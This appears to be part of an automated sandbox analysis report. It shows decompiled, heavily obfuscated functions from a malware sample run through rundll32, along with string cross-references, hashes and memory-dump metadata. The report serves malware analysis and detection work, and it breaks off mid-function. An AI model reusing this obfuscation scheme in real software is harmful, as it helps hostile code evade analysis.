				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x7c3dfc; // 0x0
						_t374 = E007ACA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E007A7FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x7c3dfc; // 0x0
									_t384 = E007ACA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E007B8519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}

0x007a5e67
0x007a5e71
0x007a5e72
0x007a5e79
0x007a5e7b
0x007a5e7c
0x007a5e7d
0x007a5e82
0x007a5e8d
0x007a5e90
0x007a5e94
0x007a5e9b
0x007a5ea0
0x007a5ea8
0x007a5eb6
0x007a5ebb
0x007a5ec5
0x007a5eca
0x007a5ed0
0x007a5ed8
0x007a5ee0
0x007a5ee5
0x007a5eea
0x007a5ef2
0x007a5efd
0x007a5f08
0x007a5f13
0x007a5f1b
0x007a5f23
0x007a5f2b
0x007a5f33
0x007a5f3b
0x007a5f43
0x007a5f4b
0x007a5f53
0x007a5f57
0x007a5f5f
0x007a5f67
0x007a5f70
0x007a5f73
0x007a5f77
0x007a5f7f
0x007a5f8c
0x007a5f95
0x007a5f99
0x007a5f9e
0x007a5fa6
0x007a5fae
0x007a5fb6
0x007a5fbe
0x007a5fc6
0x007a5fd1
0x007a5fd9
0x007a5fe4
0x007a5fec
0x007a5ff6
0x007a5ffa
0x007a6002
0x007a600a
0x007a6012
0x007a6017
0x007a601c
0x007a6024
0x007a6035
0x007a6038
0x007a603c
0x007a6044
0x007a604c
0x007a6054
0x007a605c
0x007a6064
0x007a6069
0x007a6071
0x007a6079
0x007a6081
0x007a6091
0x007a609a
0x007a609d
0x007a60a1
0x007a60a9
0x007a60b1
0x007a60b9
0x007a60be
0x007a60c6
0x007a60ce
0x007a60d6
0x007a60e2
0x007a60e6
0x007a60ee
0x007a60f6
0x007a60fe
0x007a6106
0x007a610e
0x007a6116
0x007a611e
0x007a6126
0x007a612e
0x007a6136
0x007a613b
0x007a6148
0x007a614b
0x007a614f
0x007a6157
0x007a6167
0x007a616b
0x007a6173
0x007a617b
0x007a6183
0x007a6188
0x007a6190
0x007a6194
0x007a619c
0x007a61a9
0x007a61aa
0x007a61ae
0x007a61b6
0x007a61be
0x007a61c6
0x007a61ce
0x007a61dc
0x007a61e8
0x007a61f0
0x007a61fa
0x007a61ff
0x007a6207
0x007a620f
0x007a6214
0x007a621c
0x007a6224
0x007a6232
0x007a6237
0x007a623d
0x007a6246
0x007a624b
0x007a6251
0x007a6259
0x007a6261
0x007a6265
0x007a626a
0x007a6272
0x007a6284
0x007a6289
0x007a6292
0x007a629d
0x007a62a5
0x007a62a9
0x007a62ae
0x007a62b6
0x007a62be
0x007a62c6
0x007a62ce
0x007a62d6
0x007a62de
0x007a62f0
0x007a62f8
0x007a62ff
0x007a630a
0x007a6312
0x007a631a
0x007a631f
0x007a6327
0x007a6335
0x007a6418
0x007a647f
0x007a6484
0x007a648b
0x007a64c8
0x007a64ca
0x007a64d2
0x007a648d
0x007a648d
0x00000000
0x007a648d
0x007a633b
0x007a6341
0x007a640e
0x00000000
0x007a6347
0x007a634d
0x007a63ec
0x007a63ed
0x007a63ee
0x007a63f3
0x007a63fe
0x007a6404
0x00000000
0x007a6404
0x007a6353
0x007a6359
0x007a64b1
0x007a64b7
0x00000000
0x00000000
0x007a64bd
0x007a635f
0x007a635f
0x007a63bd
0x007a63c2
0x007a63c9
0x007a63cf
0x00000000
0x007a63cf
0x007a63c9
0x007a6359
0x007a634d
0x007a6341
0x007a64e1
0x007a64e1
0x007a64a6
0x007a64ac
0x00000000

Strings

TNz7, xrefs: 007A6002
~&t, xrefs: 007A6054
`%8, xrefs: 007A6353
3n, xrefs: 007A617B
`%8, xrefs: 007A640E
fxZn, xrefs: 007A62CE
6B, xrefs: 007A6079
U, xrefs: 007A61C6
3, xrefs: 007A60BE

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
API String ID: 0-1604698900
Opcode ID: e98ad985fdd97be46c8a1a5a9eff8cb5d3c4f65179715100c407bf788c10fd75
Instruction ID: fb3a73e526921d3416b6af21d5d441677fb4d38662c1743ec16a65907dce9352
Opcode Fuzzy Hash: e98ad985fdd97be46c8a1a5a9eff8cb5d3c4f65179715100c407bf788c10fd75
Instruction Fuzzy Hash: 45F11F715083809FC368CF65D989A5BBBF1FBC5B48F10891DF29A86260D7B68949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 100453D0
GetVersion.KERNEL32 ref: 100453DB
GetVersion.KERNEL32 ref: 100453E3
GetVersion.KERNEL32 ref: 100453E9
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 100453F6

Strings

MSWHEEL_ROLLMSG, xrefs: 100453F1

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D

Uniqueness

Uniqueness Score: -1.00%

Function 007A70B3 Relevance: 10.3, Strings: 8, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007A70B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x7c3dfc; // 0x0
							_t302 = E007B5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x7c3dfc; // 0x0
								_t306 = E007B5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E007A7FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E007B8519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}

0x007a70bc
0x007a70c3
0x007a70c6
0x007a70cd
0x007a70d4
0x007a70d5
0x007a70d6
0x007a70d7
0x007a70dc
0x007a70e7
0x007a70e9
0x007a70f0
0x007a70f3
0x007a70fd
0x007a7102
0x007a7107
0x007a710f
0x007a7117
0x007a711f
0x007a7127
0x007a7132
0x007a7137
0x007a713d
0x007a7145
0x007a714d
0x007a7159
0x007a715e
0x007a7164
0x007a7169
0x007a716e
0x007a7176
0x007a7183
0x007a7186
0x007a718a
0x007a7198
0x007a719c
0x007a71a4
0x007a71ac
0x007a71b4
0x007a71bc
0x007a71c1
0x007a71c9
0x007a71d1
0x007a71db
0x007a71df
0x007a71e4
0x007a71ec
0x007a71f4
0x007a71fc
0x007a7201
0x007a7206
0x007a720e
0x007a7216
0x007a721e
0x007a7226
0x007a722e
0x007a7233
0x007a7238
0x007a7240
0x007a7248
0x007a7256
0x007a725b
0x007a7261
0x007a7266
0x007a726e
0x007a727b
0x007a727e
0x007a7282
0x007a728a
0x007a7297
0x007a729b
0x007a72a3
0x007a72ab
0x007a72b3
0x007a72b8
0x007a72c0
0x007a72c8
0x007a72cd
0x007a72d2
0x007a72da
0x007a72e2
0x007a72ea
0x007a72f2
0x007a72ff
0x007a7303
0x007a730b
0x007a731b
0x007a731f
0x007a7327
0x007a732f
0x007a7337
0x007a733f
0x007a7344
0x007a734c
0x007a7354
0x007a7359
0x007a735a
0x007a735e
0x007a7363
0x007a736b
0x007a7373
0x007a737b
0x007a7385
0x007a7389
0x007a738d
0x007a7395
0x007a739d
0x007a73a2
0x007a73aa
0x007a73b2
0x007a73b7
0x007a73bf
0x007a73c7
0x007a73cf
0x007a73d4
0x007a73dc
0x007a73ea
0x007a73ee
0x007a73f6
0x007a73fe
0x007a7403
0x007a740b
0x007a7413
0x007a741b
0x007a7420
0x007a7428
0x007a7430
0x007a743d
0x007a7443
0x007a7448
0x007a744d
0x007a7455
0x007a7463
0x007a746b
0x007a746f
0x007a7477
0x007a7477
0x007a7485
0x007a7592
0x007a75a6
0x007a75ab
0x007a75b2
0x007a75b4
0x00000000
0x007a75b4
0x007a748b
0x007a7491
0x007a7531
0x007a7542
0x007a7547
0x007a754e
0x007a75d7
0x007a75d9
0x007a75e1
0x007a7550
0x007a7550
0x00000000
0x007a7550
0x007a7493
0x007a7499
0x007a74d4
0x007a74d5
0x007a74d6
0x007a74db
0x007a74e6
0x007a74ec
0x00000000
0x007a74ec
0x007a749b
0x007a74a1
0x00000000
0x007a74a7
0x007a74b6
0x007a74bb
0x007a74a1
0x007a7499
0x007a7491
0x007a75e4
0x007a75f0
0x007a75f0
0x007a75be
0x007a75c0
0x007a75c0
0x00000000

Strings

n|, xrefs: 007A748B
[%L, xrefs: 007A72AB
Y, xrefs: 007A71AC
u, xrefs: 007A7395
hJ, xrefs: 007A73EE
n&, xrefs: 007A720E
mH, xrefs: 007A7354
n|, xrefs: 007A74EC

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: [%L$hJ$n&$n|$n|$u$Y$mH
API String ID: 0-2314355462
Opcode ID: b78f70e7f8320e544b60a2b6ea0bf1719456f768e8c9223b045175d4186d2acd
Instruction ID: 09b65a1e6ee1491b38bab4607a4c7a246d2d32d98b3221de3b63e0b1eeab1742
Opcode Fuzzy Hash: b78f70e7f8320e544b60a2b6ea0bf1719456f768e8c9223b045175d4186d2acd
Instruction Fuzzy Hash: A0D10E7150C3819FC768CF65C88995BFBE1BBC5748F50891DF2A68A220C7B6C959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007BC631 Relevance: 10.2, Strings: 8, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E007BC631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E007A474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
